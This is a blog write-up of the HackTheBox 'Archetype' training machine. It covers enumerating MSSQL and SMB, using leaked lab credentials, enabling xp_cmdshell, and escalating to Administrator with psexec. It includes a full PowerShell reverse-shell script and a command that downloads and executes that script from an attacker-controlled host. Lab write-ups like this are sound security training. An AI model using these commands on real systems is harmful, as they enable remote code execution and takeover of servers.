Virts

Virts

Virts's Blog ❤️
telegram
github
email
steam
douban
HomeArchives

HackTheBox [Archetype] WriteUp

15
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The document describes a penetration testing exercise on the HackTheBox platform, specifically targeting a system with open MSSQL and Samba ports. The attacker uses RustScan to identify these ports and discovers a configuration file containing MSSQL credentials. After successfully connecting to the MSSQL database using `mssqlclient.py`, the attacker checks for admin privileges and enables the execution of shell commands by configuring the database settings. To facilitate command execution, the attacker sets up a reverse shell using PowerShell and Netcat. They host the PowerShell script on a local server and execute it from the MSSQL environment to gain a shell on the target machine. Once they have access, they retrieve the user flag and then check PowerShell history to find the Administrator's password. Using this password, they escalate their privileges with `psexec.py` and successfully access the Administrator's flag.

image

GetShell#

Use RustScan to scan for open ports 1433 MSSQL and 445 Samba.

Accessing 445 reveals a MSSQL configuration file prod.dtsConfig. Opening the file reveals the MSSQL username and password.

  • User ID = ARCHETYPE\sql_svc
  • Password = M3g4c0rp123

Use impacket tool mssqlclient.py to connect to MSSQL.

mssqlclient.py ARCHETYPE/sql_svc:[email protected] -windows-auth

It is found that the connection is successful, but there is no permission to execute shell. However, the current database user belongs to the Admin group and has permission to modify configurations. Use the following commands to enable shell execution.

# Check if the current user is admin, returning 1 indicates belonging to admin, only admin can enable shell
SELECT IS_SRVROLEMEMBER('sysadmin');
# Enable advanced options
EXEC sp_configure 'Show Advanced Options', 1;
# Reconfigure
reconfigure;
# Enable xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 1;
# Reconfigure
reconfigure;
# Test command execution
xp_cmdshell "whoami"

At this point, GetShell is complete, but using SQL to execute shell is still quite inconvenient. A reverse shell can be obtained using nc, and then commands can be executed.

First, open an nc listening port on a host that the target machine can access.

nc -l 9443

Then prepare a PowerShell reverse shell script reverse-shell.ps1.

# Fill in the nc listening host address and port here
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.45",9443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + "# ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()};
$client.Close()

Place this script on a host that the target machine can access and enable HTTP access.

python -m http.server 80

Then connect to the target machine's MSSQL and load the remote PowerShell script.

mssqlclient.py ARCHETYPE/sql_svc:[email protected] -windows-auth

xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.45/reverse-shell.ps1\");"

At this point, the nc listening port should have obtained the shell, and the current user's flag can be queried.

type C:\Users\sql_svc\Desktop\user.txt

Privilege Escalation#

Check the PowerShell history, and the Administrator's password can be found.

type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

With the known password, use impacket tool psexec.py for privilege escalation.

Log in using the previously obtained password, successfully escalate privileges, and find the Administrator's flag.

type C:\Users\Administrator\Desktop\root.txt
Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.